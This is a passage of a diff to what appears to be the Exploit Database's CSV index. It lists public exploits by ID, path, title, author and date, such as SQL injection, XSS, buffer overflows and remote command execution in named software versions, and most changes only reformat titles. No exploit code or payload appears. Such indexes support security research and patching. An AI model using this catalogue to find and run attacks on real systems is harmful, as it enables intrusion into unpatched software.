'sid' Parameter SQL Injection Vulnerability",2008-05-17,Lovebug,php,webapps,0 +31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Parameter Local File Include Vulnerability",2008-05-19,Lostmon,php,webapps,0 +31807,platforms/php/webapps/31807.txt,"cPanel <= 11.21 - 'wwwact' Remote Privilege Escalation Vulnerability",2008-05-19,"Ali Jasbi",php,webapps,0 +31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 - 'appservlang' Parameter Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0 +31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 - 'index.php' Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0 +31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 - 'slide' Parameter SQL Injection Vulnerability",2008-05-20,"fahn zichler",php,webapps,0 +31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti - Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0 +31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' Parameter SQL Injection Vulnerability",2008-05-20,U238,asp,webapps,0 +31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0 31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0 -31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 File Processing Buffer Overflow Vulnerability",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 -31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability",2008-05-21,DSecRG,java,webapps,0 -31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0 -31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (1)",2008-05-21,"Martin Nagy",windows,dos,0 -31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 -31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 Multiplexer Buffer Overflow Vulnerability",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 -31821,platforms/php/webapps/31821.txt,"phpFreeForum 1.0 rc2 error.php message Parameter XSS",2008-05-22,tan_prathan,php,webapps,0 -31822,platforms/php/webapps/31822.txt,"phpFreeForum 1.0 rc2 part/menu.php Multiple Parameter XSS",2008-05-22,tan_prathan,php,webapps,0 -31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 cms/includes/header.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 -31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 cms/includes/login.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 -31825,platforms/php/webapps/31825.txt,"BMForum 5.6 index.php outpused Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 -31826,platforms/php/webapps/31826.txt,"BMForum 5.6 newtem/footer/bsd01footer.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 -31827,platforms/php/webapps/31827.txt,"BMForum 5.6 newtem/header/bsd01header.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 -31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall <= 3.5.11 'ldap_test.cgi' Cross-Site Scripting Vulnerability",2008-05-22,"Information Risk Management Plc",hardware,remote,0 -31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 -31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0 +31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 - File Processing Buffer Overflow Vulnerability",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 +31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability",2008-05-21,DSecRG,java,webapps,0 +31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0 +31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service Vulnerability (1)",2008-05-21,"Martin Nagy",windows,dos,0 +31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service Vulnerability (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 +31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 - Multiplexer Buffer Overflow Vulnerability",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 +31821,platforms/php/webapps/31821.txt,"phpFreeForum 1.0 rc2 - error.php message Parameter XSS",2008-05-22,tan_prathan,php,webapps,0 +31822,platforms/php/webapps/31822.txt,"phpFreeForum 1.0 rc2 - part/menu.php Multiple Parameter XSS",2008-05-22,tan_prathan,php,webapps,0 +31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 +31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 +31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - index.php outpused Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 +31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 +31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 +31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall <= 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting Vulnerability",2008-05-22,"Information Risk Management Plc",hardware,remote,0 +31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 +31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0 31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability",2014-02-22,"Mohamed Shetta",windows,remote,30000 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 (clicktracker.php, track param) - SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 -31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 -31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' SQL Injection Vulnerability",2008-05-24,eserg.ru,php,webapps,0 -31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 'fname' Parameter SQL Injection Vulnerability",2008-05-24,"Ali Jasbi",php,webapps,0 -31838,platforms/php/webapps/31838.txt,"Horde Multiple Product workweek.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 -31839,platforms/php/webapps/31839.txt,"Horde Multiple Product week.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 -31840,platforms/php/webapps/31840.txt,"Horde Multiple Product day.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 -31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0 -31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 'adv_cat.php' SQL Injection Vulnerability",2008-05-26,Jasbi,php,webapps,0 -31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0 -31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 -31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0 -31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 -31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0 -31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0 -31856,platforms/windows/dos/31856.html,"CA Internet Security Suite 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0 -31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 -31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0 -31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 -31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 -31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0 -31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0 -31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0 -31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0 -31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0 -31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0 -31867,platforms/php/webapps/31867.php,"CMS Easyway 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0 -31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0 -31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0 -31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 -31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 -31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0 -31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0 +31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php, track param) - SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 +31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' - SQL Injection Vulnerability",2008-05-24,eserg.ru,php,webapps,0 +31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection Vulnerability",2008-05-24,"Ali Jasbi",php,webapps,0 +31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 +31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - week.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 +31840,platforms/php/webapps/31840.txt,"Horde Multiple Product - day.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 +31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 - 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0 +31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 - 'adv_cat.php' SQL Injection Vulnerability",2008-05-26,Jasbi,php,webapps,0 +31843,platforms/asp/webapps/31843.txt,"Excuse Online - 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0 +31844,platforms/php/webapps/31844.txt,"phpFix 2.0 - fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31845,platforms/php/webapps/31845.txt,"phpFix 2.0 - auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 +31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0 +31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 +31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0 +31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0 +31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0 +31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component - 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 +31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' - Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0 +31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0 +31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 - dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0 +31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 - dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0 +31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 - docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0 +31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0 +31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0 +31867,platforms/php/webapps/31867.php,"CMS Easyway - 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0 +31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0 +31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 - 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0 +31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component - 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 +31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 +31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0 +31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0 31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,@sha0coder,linux,remote,0 -31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 -31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0 -31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 -31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 -31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 'index.php' Cross Site Scripting Vulnerability",2008-06-04,ZoRLu,php,webapps,0 -31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 -31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 'tid' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0 -31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 'completed' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0 -31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",2008-06-05,dubingyao,hardware,dos,0 -31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS",2008-06-05,nnposter,hardware,remote,0 -31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/index.php sql_matchscope Parameter XSS",2008-06-05,nnposter,hardware,remote,0 -31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0 -31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 Multiple Cross Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 -31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 Client Buffer Overflow Vulnerabilities",2008-07-02,"Francisco Amato",novell,dos,0 -31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature HTML Injection and Information Disclosure Vulnerabilities",2008-06-20,"Ferruh Mavituna",multiple,remote,0 -31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 -31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0 -31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0 +31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 +31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0 +31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 +31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 +31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 - 'index.php' Cross Site Scripting Vulnerability",2008-06-04,ZoRLu,php,webapps,0 +31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 +31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 - 'tid' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0 +31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 - 'completed' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0 +31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 - Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",2008-06-05,dubingyao,hardware,dos,0 +31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS",2008-06-05,nnposter,hardware,remote,0 +31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter XSS",2008-06-05,nnposter,hardware,remote,0 +31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0 +31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 +31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 - Client Buffer Overflow Vulnerabilities",2008-07-02,"Francisco Amato",novell,dos,0 +31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection and Information Disclosure Vulnerabilities",2008-06-20,"Ferruh Mavituna",multiple,remote,0 +31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 - 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 +31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0 +31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0 31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80 31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080 31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80 -31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0 -31902,platforms/php/webapps/31902.txt,"Noticia Portal 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0 -31903,platforms/linux/remote/31903.asm,"NASM 2.0 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0 -31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 admin/login.php username Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 last_records.php annuaire Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0 -31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 annuaire.php Multiple Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0 -31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 -31909,platforms/windows/remote/31909.html,"XChat 2.8.7b 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0 -31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0 +31900,platforms/hardware/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,hardware,webapps,0 +31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0 +31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0 +31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0 +31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php username Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0 +31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0 